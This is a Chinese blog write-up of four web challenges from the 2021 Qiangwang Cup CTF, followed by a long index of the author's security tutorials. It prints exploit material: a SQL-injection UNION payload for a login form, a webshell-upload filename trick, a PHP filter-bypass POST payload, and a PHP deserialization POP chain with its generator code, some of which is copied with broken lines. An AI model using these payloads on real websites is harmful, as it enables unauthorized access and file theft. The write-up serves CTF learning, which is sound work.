強網杯作為國內最好的CTF比賽之一,搞安全的博友和初學者都可以去嘗試下,首先,讓我們觀摩下這些大神隊伍,包括0x300R、eee、0ops、AAA、NeSE、Nu1L等,真的值得我們去學習,其次,非常感謝強網杯的主辦方,這么好的比賽離不開許多師傅們的辛苦,我們應該感恩這么高質量比賽的幕后作業者,最后,作為一枚安全菜雞,不,比菜雞還菜,就讓我簡單復現下本次比賽的Web題目,不喜勿噴,歡迎指正~
由于這次強網杯正值端午節,自己回家陪小孩和女神了,不回去也做不出來o(╥﹏╥)o,因此僅僅大致閱覽了下Web題目,但整體而言,比賽題目的水準仍然非常高,尤其是RE和PWN,包括Web,所以還是有很多知識點值得我們學習的,最后,非常感謝參考文獻的大佬們,尤其是Nu1L戰隊(推薦VX關注他們),也感謝許多參加比賽的伙伴和博友們,如果您是一名安全初學者,不妨多參加比賽,每一次CTF比賽都能讓我們學到很多東西,即使是賽后的WP,也能成長不少,同時有個遺憾,比賽完后題目不能打開復現,將就看吧,
作者在外讀博求學,接下里的時間都會放到論文和實驗上,因此CSDN已停更技術文章,但這篇文章還是總結出來,只望對初學者有幫助,此外,我為自己定了一個新目標,33歲之后(博士畢業),正式進軍CTF和AI比賽圈,那時候會刷大量的CTF題及參加各種實戰比賽,寓教于樂,也希望能帶著我貴州的學生站在CTF的舞臺上或沖榜天池,到了那時,希望我這位菜鳥大叔還能保持激情,哈哈,加油,且行且珍惜~
比賽資訊
- 比賽全稱:第五屆強網杯全國網路安全挑戰賽
- 比賽地址:https://ctf.ichunqiu.com/2021qwb
- 開始時間:2021-06-12 09:00:00
- 結束時間:2020-06-13 21:00:00
文章目錄
- 一.EasyWeb
- 1.題目描述
- 2.解題思路
- 二.[強網先鋒]尋寶
- 1.題目描述
- 2.解題思路
- 三.[強網先鋒]賭徒
- 1.題目描述
- 2.解題思路
- 四.pop_master
- 1.題目描述
- 2.解題思路
- 3.官方解題
- 五.總結
宣告:本人堅決反對利用教學方法進行犯罪的行為,一切犯罪行為必將受到嚴懲,綠色網路需要我們共同維護,更推薦大家了解它們背后的原理,更好地進行防護,該安全系列原文github已開源,如果喜歡也可以支持作者,賺點奶粉錢,哈哈,
個人而言,感覺自己能做出來的主要是這四道題目,因此先結合大佬們的WP復述,下面一些方法是從我這個菜鳥的角度介紹,各位大神見笑,可以幫忙批評和指正,哈哈~
一.EasyWeb
1.題目描述
題目描述如下:
- 共132支隊伍攻克,最后分值67pt
該網站打開如下圖所示:
2.解題思路
如果直接訪問檔案會提示錯誤,
第一步,從github下載dirsearch工具(Python腳本),這是一個目錄掃描工具,目的是掃描網站的敏感檔案和目錄從而找到突破口,
-
https://github.com/maurosoria/dirsearch
-
大佬們用啥掃描軟體呢?Kali dirb嗎?
通過dirsearch掃描目錄,自己在目錄輸入欄輸入CMD快速進入,我們發現了敏感檔案目錄 files ,
- -u:指定網址
- -e:指定網站語言
- -w:指定字典
- -r:遞回目錄(跑出目錄后,繼續跑目錄下面的目錄)
- -random-agents:使用隨機UA
第二步,打開files目錄發現每個檔案對應的路徑,
- http://47.104.137.239/files/
[{"id":1,"path":"c09358adff2ebfff2ef9b4fbacc4ac0b","filename":"hint.txt","date":"5/31/2021, 9:10:29 PM"},
{"id":2,"path":"1c60db40f1f992ff1b8243c1e24dd149","filename":"exp.py","date":"5/31/2021, 9:11:27 PM"},
{"id":3,"path":"da2574de5ac23b656882772a625ba310","filename":"www.zip","date":"5/31/2021, 9:12:44 PM"}]
我蠢蠢的拼接路徑,還是無法打開,大概猜測后續需要進一步獲取這些敏感檔案,但如何獲取可能需要提權或其他滲透手段,
下面開始參考Nu1L大神們的WP,哎,自己還是太菜了,哈哈 ^O(∩_∩)O
第三步,我們嘗試打開hint目錄,可以看到提示去服務器獲取檔案的資訊,
- http://47.104.137.239/hint
{"hint":"# hint ^_^\n\tSo~ How to get files in this server?
\n\tfiles/????????????????????????????????"}
第四步,他們掃描發現了后臺登錄頁面,網址如下:
- http://47.104.137.239:36842/account/login
- 怎么掃描這個IP地址和目錄的呢?
Try to scan 35000-40000 ^_^.
All tables are empty except for the table where the username and password
are located
Table: employ
第五步,發現后臺登錄存在注入,直接進入后臺,使用注入陳述句如下,
- 只恨網站關閉不能復現,淚奔 ~~o(>_<)o ~~
' union select 1,2,3,4,5,6,7-- a
第六步,掃描發現存在 file 路由檔案上傳,經過測驗發現檔案采用無字符webshell,檔案名為 1.p<h<p,即可上傳shell,
第七步, jboss 部署 war 包拿 flag,
都是什么神仙操作,有時候看著只差一步,但差之千里,功夫還太淺,
加油吧!少年,多向這些大佬學習,
二.[強網先鋒]尋寶
1.題目描述
題目描述如下:
- 共304支隊伍攻克,最后分值31pt
該網站打開如下圖所示:
該題目WP參考joker-yan大佬的解題思路,在此感謝,CSDN博友的可以關注他一波,
- https://blog.csdn.net/weixin_46245411/article/details/117898565
2.解題思路
該網站包括兩個輸入框,需要你輸入Key1和Key2然后解密,通過資訊1和資訊2分別獲取兩段Key值,
第一步,分別下載線索1和線索2,
- 線索1為source1.php,代碼審計
- 線索2為docx壓縮包,需要撰寫腳本自動遍歷,
第二步,分析source1.php源代碼,通過bypass獲取結果,
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
function filter($string){
$filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
$filter_phrase= '/'.implode('|',$filter_word).'/';
return preg_replace($filter_phrase,'',$string);
}
if($ppp){
unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";
$ppp['number4'] = '1';
$ppp['number5'] = '1';
extract($_POST);
$num1 = filter($ppp['number1']);
$num2 = filter($ppp['number2']);
$num3 = filter($ppp['number3']);
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);
if(isset($num1) && is_numeric($num1)){
die("非數字");
}
else{
if($num1 > 1024){
echo "第一層";
if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
echo "第二層";
if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
echo "第三層";
if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
echo "第四層";
if(!isset($num5)||(strlen($num5)==0)) die("no");
$b=json_decode(@$num5);
if($y = $b === NULL){
if($y === true){
echo "第五層";
include 'KeY1lhv.php';
echo $KEY1;
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no111");
}
}
非數字
?>
核心bypass代碼如下:
第三步,嘗試在本地搭建環境進行bypass五層繞過,
- 第一層:要求非純數字且大于1024,利用PHP的格式轉換(字串比較讀取)$num1=11111a即可,
- 第二層:繞過intval函式,利用科學技術法繞過長度小于5,
- 第三層:substr(md5)取值為某個值,利用腳本運行md5,計算出num3為61823470,
<?php
for ($a=60000000;$a<70000000;$a++)
{
if(substr(md5($a),0,7)=='4bf21cd')
{
echo $a;
}
}
?>
- 第四層:科學計數法繞過,長度為7且為0,num4為0e00000,
- 第五層:JSON格式的字串為空,json_decode在決議非json格式的時候會自動置空NULL,所以很容易繞過,比如num5為a即可,
第四步,最終構造的Payload能繞過source1.php,
ppp[number1]=11111a&&ppp[number2]=3.0e6&ppp[number3]=61823470&
ppp[number4]=0e00000&ppp[number5]=eastmount
此時,我們得到Key1,
- KEY1{e1e1d3d40573127e9ee0480caf1283d6}
第五步,注意下載該壓縮包總失敗,我們可以隨意使用?個支持自動分片下載的下載工具即可,如迅雷,解壓后發現是一對docx檔案,撰寫一個Python腳本遍歷搜索“KEY2”即可,
方法很多,比如LU神的代碼,
再如Nu1L大神的代碼,
import glob
import zipfile
import tqdm
from xml.etree.cElementTree import XML
WORD_NAMESPACE = '{http://schemas.openxmlformats.org/wordprocessingml/2006/main}'
PARA = WORD_NAMESPACE + 'p'
TEXT = WORD_NAMESPACE + 't'
def get_docx_text(path):
document = zipfile.ZipFile(path)
xml_content = document.read('word/document.xml')
document.close()
tree = XML(xml_content)
paragraphs = []
for paragraph in tree.getiterator(PARA):
texts = [node.text
for node in paragraph.getiterator(TEXT)
if node.text]
if texts:
paragraphs.append(''.join(texts))
return '\n\n'.join(paragraphs)
files = glob.glob('*/*/*.docx')
for fname in tqdm.tqdm(files):
res = get_docx_text(fname)
if 'key2{' in res.lower():
print(fname, res)
- KEY2{T5fo0Od618l91SlG6l1l42l3a3ao1nblfsS}
第六步,輸入兩個KEY值既可以獲取最終的flag,
- flag{798ef6da-41a9-4a14-a8a8-8b6351f3e162}
三.[強網先鋒]賭徒
1.題目描述
題目描述如下:
- 共499支隊伍攻克,最后分值20pt
該網站打開如下圖所示:
- I think you need /etc/hint . Before this you need to see the source code
該題目未做出來真的該打,一方面自己對反序列化還是不夠深入,另一方面還是自己太菜,后面做50道反序列化題目,然后寫篇博客總結吧!
2.解題思路
第一步,結合題目原始碼提醒,利用dirsearch掃描目錄,發現 www.zip 檔案,
第二步,該壓縮包解壓為一個index.php源檔案,核心思想是bypass反序列化然后執行hint.php得到flag,
- unserialize會執行wakeup,需要繞過
index.php
<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);
class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");';
public function __construct(){
echo "I think you need /etc/hint . Before this you need to see the source code";
}
public function _sayhello(){
echo $this->name;
return 'ok';
}
public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}
class Info
{
private $phonenumber=123123;
public $promise='I do';
public function __construct(){
$this->promise='I will not !!!!';
return $this->promise;
}
public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';
public function __get($name){
$function = $this->a;
return $function();
}
public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}
public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}
if(isset($_GET['hello'])){
unserialize($_GET['hello']);
}else{
$hi = new Start();
}
?>
第三步,構造序列化代碼生成payload,這里參考Nu1L的代碼,
dt-wp.php
<?php
class Start
{
public $name;
public function __construct($a){
$this->name=$a;
}
}
class Info
{
public $file;
public function __construct($b){
$this->file['filename']=$b;
}
}
class Room
{
public $filename="/flag";
public $a;
public function __construct(){
$this->filename="/flag";
}
public function invoke(){
$this->a=new Room();
}
}
$a=new Room();
$a->invoke();
$b=new Info($a);
$c=new Start($b);
echo serialize($c);
?>
生成的結果如下圖所示,通過該構造即可獲取flag,
O:5:"Start":1:{s:4:"name";O:4:"Info":1:{s:4:"file";a:1:{s:8:"filename";O:4:"Room":2:{s:8:"filename";s:5:"/flag";s:1:"a";O:4:"Room":2:{s:8:"filename";s:5:"/flag";s:1:"a";N;}}}}}
PS:由于太菜,還需要消化一段時間,后續作者會深入分析…
- 從一道CTF題學習PHP反序列化漏洞 - freebuf
- 記一道CTF反序列化 - CSDN
- PHP反序列化漏洞總結 - CSDN
四.pop_master
1.題目描述
題目描述如下:
- 共188支隊伍攻克,最后分值49pt
該網站打開如下圖所示:
<?php
include "class.php";
//class.php.txt
highlight_file(__FILE__);
$a = $_GET['pop'];
$b = $_GET['argv'];
$class = unserialize($a);
$class->nZepGo($b);
這道題目據說非常有意思,坐等官網和更多大佬的WP,看到官方bibi大神了~
2.解題思路
這里僅放個Nu1L大佬的WP,
from phply import phplex
from phply.phpparse import make_parser
from phply.phpast import *
import pprint
import nose
parser = make_parser()
func_name = "find your func"
con = open("./qwb/class.php").read()
lexer = phplex.lexer.clone()
lexer.filename = None
output = parser.parse(con, lexer=lexer)
functions = {}
target = functions[func_name] i = 0
# 強賦值函式直接跳過
skip_func = []
pop_chain = []
pop_chain.append(func_name) e = False
for out in output:
class_name = out.name
for node in out.nodes:
if(type(node) == Method):
functions[node.name] = out
while(e is False):
for node in target.nodes:
if(type(node) == Method):
if node.name == func_name:
for subnode in node.nodes:
if type(subnode) == MethodCall:
# print(subnode)
if(subnode.name in skip_func):
continue
target = functions[subnode.name]
func_name = subnode.name
pop_chain.append(func_name)
break
if(type(subnode) == If):
# print(subnode)
if type(subnode.node) == MethodCall :
# print(subnode.node.name)
if( subnode.node.name in skip_func):
continue
target = functions[subnode.node.name]
func_name = subnode.node.name
pop_chain.append(func_name)
break
if(type(subnode) == Eval):
e = True
for pop in pop_chain:
print("class " + functions[pop].name + "{")
for node in functions[pop].nodes:
if(type(node) == ClassVariables):
for subnode in node.nodes:
print("public " + subnode.name + ';')
print("public function __construct(){")
if i+1 == len(pop_chain):
print("")
else:
print("$this->" + subnode.name[1:] + "= new " +
functions[pop_chain[i+1]].name + "();")
print("}")
print("}")
i += 1
if i == len(pop_chain):
break
3.官方解題
后續補充官方解題和手擼程序…
五.總結
寫到這里,這篇文章就介紹結束了,希望對您有所幫助,希望三年博士畢業后,我不再是WP分享者,而能夠通過參賽和學習做出更多的題目,也期待帶學生一起比賽的一天,加油!下面簡單總結每題知識點,
- 第一題 EasyWeb
敏感目錄掃描+注入漏洞+檔案上傳+ jboss部署war
-第二題 [強網先鋒]尋寶
PHP代碼審計+Python遍歷doc檔案+兩個KEY解密 - 第三題 [強網先鋒]賭徒
敏感目錄掃描+源檔案代碼審計+反序列化漏洞+bypass構造 - 第四題 pop_master
坐等官方解密
作者作為網路安全的小白,分享一些自學基礎教程給大家,主要是關于安全工具和實踐操作的在線筆記,希望您們喜歡,同時,由于在外讀博,目前暫停技術更新,但這篇確實應該總結下,希望您能與我一起操作和進步,總之,希望該系列文章對博友有所幫助,寫文不易,大神們不喜勿噴,謝謝!如果文章對您有幫助,將是我創作的最大動力,點贊、評論、私聊均可,一起加油喔,同時再次感謝參考文獻中的安全大佬們的文章分享,尤其Nu1L戰隊,深知自己很菜,得努力前行,
歡迎大家討論,是否覺得這系列文章幫助到您!任何建議都可以評論告知讀者,共勉,
- 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
- 網路安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study
(By:Eastmount 2021-06-15 夜于武漢 http://blog.csdn.net/eastmount/ )
自學篇(鏈接直接跳轉到正文):
- [網路安全自學篇] 一.入門筆記之看雪Web安全學習及異或解密示例
- [網路安全自學篇] 二.Chrome瀏覽器保留密碼功能滲透決議及登錄加密入門筆記
- [網路安全自學篇] 三.Burp Suite工具安裝配置、Proxy基礎用法及暴庫示例
- [網路安全自學篇] 四.實驗吧CTF實戰之WEB滲透和隱寫術解密
- [網路安全自學篇] 五.IDA Pro反匯編工具初識及逆向工程解密實戰
- [網路安全自學篇] 六.OllyDbg動態分析工具基礎用法及Crakeme逆向
- [網路安全自學篇] 七.快手視頻下載之Chrome瀏覽器Network分析及Python爬蟲探討
- [網路安全自學篇] 八.Web漏洞及埠掃描之Nmap、ThreatScan和DirBuster工具
- [網路安全自學篇] 九.社會工程學之基礎概念、IP獲取、IP物理定位、檔案屬性
- [網路安全自學篇] 十.論文之基于機器學習演算法的主機惡意代碼
- [網路安全自學篇] 十一.虛擬機VMware+Kali安裝入門及Sqlmap基本用法
- [網路安全自學篇] 十二.Wireshark安裝入門及抓取網站用戶名密碼(一)
- [網路安全自學篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及資料流追蹤和影像抓取(二)
- [網路安全自學篇] 十四.Python攻防之基礎常識、正則運算式、Web編程和套接字通信(一)
- [網路安全自學篇] 十五.Python攻防之多執行緒、C段掃描和資料庫編程(二)
- [網路安全自學篇] 十六.Python攻防之弱口令、自定義字典生成及網站暴庫防護
- [網路安全自學篇] 十七.Python攻防之構建Web目錄掃描器及ip代理池(四)
- [網路安全自學篇] 十八.XSS跨站腳本攻擊原理及代碼攻防演示(一)
- [網路安全自學篇] 十九.Powershell基礎入門及常見用法(一)
- [網路安全自學篇] 二十.Powershell基礎入門及常見用法(二)
- [網路安全自學篇] 二十一.GeekPwn極客大賽之安全攻防技術總結及ShowTime
- [網路安全自學篇] 二十二.Web滲透之網站資訊、域名資訊、埠資訊、敏感資訊及指紋資訊收集
- [網路安全自學篇] 二十三.基于機器學習的惡意請求識別及安全領域中的機器學習
- [網路安全自學篇] 二十四.基于機器學習的惡意代碼識別及人工智能中的惡意代碼檢測
- [網路安全自學篇] 二十五.Web安全學習路線及木馬、病毒和防御初探
- [網路安全自學篇] 二十六.Shodan搜索引擎詳解及Python命令列呼叫
- [網路安全自學篇] 二十七.Sqlmap基礎用法、CTF實戰及請求引數設定(一)
- [網路安全自學篇] 二十八.檔案上傳漏洞和Caidao入門及防御原理(一)
- [網路安全自學篇] 二十九.檔案上傳漏洞和IIS6.0決議漏洞及防御原理(二)
- [網路安全自學篇] 三十.檔案上傳漏洞、編輯器漏洞和IIS高版本漏洞及防御(三)
- [網路安全自學篇] 三十一.檔案上傳漏洞之Upload-labs靶場及CTF題目01-10(四)
- [網路安全自學篇] 三十二.檔案上傳漏洞之Upload-labs靶場及CTF題目11-20(五)
- [網路安全自學篇] 三十三.檔案上傳漏洞之繞狗一句話原理和繞過安全狗(六)
- [網路安全自學篇] 三十四.Windows系統漏洞之5次Shift漏洞啟動計算機
- [網路安全自學篇] 三十五.惡意代碼攻擊溯源及惡意樣本分析
- [網路安全自學篇] 三十六.WinRAR漏洞復現(CVE-2018-20250)及惡意軟體自啟動劫持
- [網路安全自學篇] 三十七.Web滲透提高班之hack the box在線靶場注冊及入門知識(一)
- [網路安全自學篇] 三十八.hack the box滲透之BurpSuite和Hydra密碼爆破及Python加密Post請求(二)
- [網路安全自學篇] 三十九.hack the box滲透之DirBuster掃描路徑及Sqlmap高級注入用法(三)
- [網路安全自學篇] 四十.phpMyAdmin 4.8.1后臺檔案包含漏洞復現及詳解(CVE-2018-12613)
- [網路安全自學篇] 四十一.中間人攻擊和ARP欺騙原理詳解及漏洞還原
- [網路安全自學篇] 四十二.DNS欺騙和釣魚網站原理詳解及漏洞還原
- [網路安全自學篇] 四十三.木馬原理詳解、遠程服務器IPC$漏洞及木馬植入實驗
- [網路安全自學篇] 四十四.Windows遠程桌面服務漏洞(CVE-2019-0708)復現及詳解
- [網路安全自學篇] 四十五.病毒詳解及批處理病毒制作(自啟動、修改密碼、定時關機、藍屏、行程關閉)
- [網路安全自學篇] 四十六.微軟證書漏洞CVE-2020-0601 (上)Windows驗證機制及可執行檔案簽名復現
- [網路安全自學篇] 四十七.微軟證書漏洞CVE-2020-0601 (下)Windows證書簽名及HTTPS網站劫持
- [網路安全自學篇] 四十八.Cracer第八期——(1)安全術語、Web滲透流程、Windows基礎、注冊表及常用DOS命令
- [網路安全自學篇] 四十九.Procmon軟體基本用法及檔案行程、注冊表查看
- [網路安全自學篇] 五十.虛擬機基礎之安裝XP系統、檔案共享、網路快照設定及Wireshark抓取BBS密碼
- [網路安全自學篇] 五十一.惡意樣本分析及HGZ木馬控制目標服務器
- [網路安全自學篇] 五十二.Windows漏洞利用之堆疊溢位原理和堆疊保護GS機制
- [網路安全自學篇] 五十三.Windows漏洞利用之Metasploit實作堆疊溢位攻擊及反彈shell
- [網路安全自學篇] 五十四.Windows漏洞利用之基于SEH例外處理機制的堆疊溢位攻擊及shell提取
- [網路安全自學篇] 五十五.Windows漏洞利用之構建ROP鏈繞過DEP并獲取Shell
- [網路安全自學篇] 五十六.i春秋老師分享小白滲透之路及Web滲透技術總結
- [網路安全自學篇] 五十七.PE檔案逆向之什么是數字簽名及Signtool簽名工具詳解(一)
- [網路安全自學篇] 五十八.Windows漏洞利用之再看CVE-2019-0708及Metasploit反彈shell
- [網路安全自學篇] 五十九.Windows漏洞利用之MS08-067遠程代碼執行漏洞復現及shell深度提權
- [網路安全自學篇] 六十.Cracer第八期——(2)五萬字總結Linux基礎知識和常用滲透命令
- [網路安全自學篇] 六十一.PE檔案逆向之數字簽名詳細決議及Signcode、PEView、010Editor、Asn1View等工具用法(二)
- [網路安全自學篇] 六十二.PE檔案逆向之PE檔案決議、PE編輯工具使用和PE結構修改(三)
- [網路安全自學篇] 六十三.hack the box滲透之OpenAdmin題目及蟻劍管理員提權(四)
- [網路安全自學篇] 六十四.Windows漏洞利用之SMBv3服務遠程代碼執行漏洞(CVE-2020-0796)復現及詳解
- [網路安全自學篇] 六十五.Vulnhub靶機滲透之環境搭建及JIS-CTF入門和蟻劍提權示例(一)
- [網路安全自學篇] 六十六.Vulnhub靶機滲透之DC-1提權和Drupal漏洞利用(二)
- [網路安全自學篇] 六十七.WannaCry勒索病毒復現及分析(一)Python利用永恒之藍及Win7勒索加密
- [網路安全自學篇] 六十八.WannaCry勒索病毒復現及分析(二)MS17-010利用及病毒決議
- [網路安全自學篇] 六十九.宏病毒之入門基礎、防御措施、自發郵件及APT28樣本分析
- [網路安全自學篇] 七十.WannaCry勒索病毒復現及分析(三)蠕蟲傳播機制分析及IDA和OD逆向
- [網路安全自學篇] 七十一.深信服分享之外部威脅防護和勒索病毒對抗
- [網路安全自學篇] 七十二.逆向分析之OllyDbg動態除錯工具(一)基礎入門及TraceMe案例分析
- [網路安全自學篇] 七十三.WannaCry勒索病毒復現及分析(四)蠕蟲傳播機制全網原始碼詳細解讀
- [網路安全自學篇] 七十四.APT攻擊檢測溯源與常見APT組織的攻擊案例
- [網路安全自學篇] 七十五.Vulnhub靶機滲透之bulldog資訊收集和nc反彈shell(三)
- [網路安全自學篇] 七十六.逆向分析之OllyDbg動態除錯工具(二)INT3斷點、反除錯、硬體斷點與記憶體斷點
- [網路安全自學篇] 七十七.惡意代碼與APT攻擊中的武器(強推Seak老師)
- [網路安全自學篇] 七十八.XSS跨站腳本攻擊案例分享及總結(二)
- [網路安全自學篇] 七十九.Windows PE病毒原理、分類及感染方式詳解
- [網路安全自學篇] 八十.WHUCTF之WEB類解題思路WP(代碼審計、檔案包含、過濾繞過、SQL注入)
- [網路安全自學篇] 八十一.WHUCTF之WEB類解題思路WP(檔案上傳漏洞、冰蝎蟻劍、反序列化phar)
- [網路安全自學篇] 八十二.WHUCTF之隱寫和逆向類解題思路WP(文字解密、圖片解密、佛語解碼、冰蝎流量分析、逆向分析)
- [網路安全自學篇] 八十三.WHUCTF之CSS注入、越權、csrf-token竊取及XSS總結
- [網路安全自學篇] 八十四.《Windows hk編程技術詳解》之VS環境配置、基礎知識及DLL延遲加載詳解
- [網路安全自學篇] 八十五.《Windows hk編程技術詳解》之注入技術詳解(全域鉤子、遠執行緒鉤子、突破Session 0注入、APC注入)
- [網路安全自學篇] 八十六.威脅情報分析之Python抓取FreeBuf網站APT文章(上)
- [網路安全自學篇] 八十七.惡意代碼檢測技術詳解及總結
- [網路安全自學篇] 八十八.基于機器學習的惡意代碼檢測技術詳解
- [網路安全自學篇] 八十九.PE檔案決議之通過Python獲取時間戳判斷軟體來源地區
- [網路安全自學篇] 九十.遠控木馬詳解及APT攻擊中的遠控
- [網路安全自學篇] 九十一.阿里云搭建LNMP環境及實作PHP自定義網站IP訪問 (1)
- [網路安全自學篇] 九十二.《Windows hk編程技術詳解》之病毒啟動技術創建行程API、突破SESSION0隔離、記憶體加載詳解(3)
- [網路安全自學篇] 九十三.《Windows hk編程技術詳解》之木馬開機自啟動技術(注冊表、計劃任務、系統服務)
- [網路安全自學篇] 九十四.《Windows hk編程技術詳解》之提權技術(令牌權限提升和Bypass UAC)
- [網路安全自學篇] 九十五.利用XAMPP任意命令執行漏洞提升權限(CVE-2020-11107)
提高篇:
- [網路安全提高班] 一〇一.網路空間安全普及和醫療資料安全防護總結
- [網路安全提高篇] 一〇二.Metasploit技術之基礎用法萬字詳解及MS17-010漏洞復現
- [網路安全提高篇] 一〇三.Metasploit后滲透技術之資訊收集、權限提權、移植漏洞模塊和后門
- [網路安全提高篇] 一〇四.網路滲透靶場Oracle+phpStudy本地搭建萬字詳解(SQL注入、XSS攻擊、檔案上傳漏洞)
- [網路安全提高篇] 一〇五.SQL注入之揭秘Oracle資料庫注入漏洞和致命問題(聯合Cream老師)
- [網路安全提高篇] 一〇六.SQL注入之手工注入和SQLMAP入門案例詳解
- [網路安全提高篇] 一〇七.安全威脅框架理解及勒索病毒取證溯源分析(藍隊)
- [網路安全提高篇] 一〇八.Powershell和PowerSploit腳本攻擊詳解 (1)
- [網路安全提高篇] 一〇九.津門杯CTF的Web Write-Up萬字詳解(SSRF、檔案上傳、SQL注入、代碼審計、中國蟻劍)
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/287881.html
標籤:其他